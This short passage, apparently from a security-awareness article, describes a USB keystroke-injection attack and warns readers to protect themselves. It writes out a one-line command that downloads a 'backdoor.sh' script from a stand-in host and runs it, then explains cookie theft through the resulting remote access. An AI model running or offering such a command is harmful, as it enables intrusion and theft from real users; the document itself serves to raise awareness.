 CTRL + ALT + T wget https://example.com/backdoor.sh && chmod +x backdoor.sh && bash backdoor.sh ENTER exit ENTER

 This can be executed within a second, and then the USB dongle can be ejected.
 No one will notice.
+The camera in the room will not "see" a cleaner touching the keyboard.
 This backdoor script can connect to a hacker-owned server and proxy any commands and outputs via ssh.
 Then they can just clone your cookies and let themselves log in to any website, taking money from you or your company’s account.

 The sooner you understand that only you can take care of your security, the lesser the probability you will become a victim.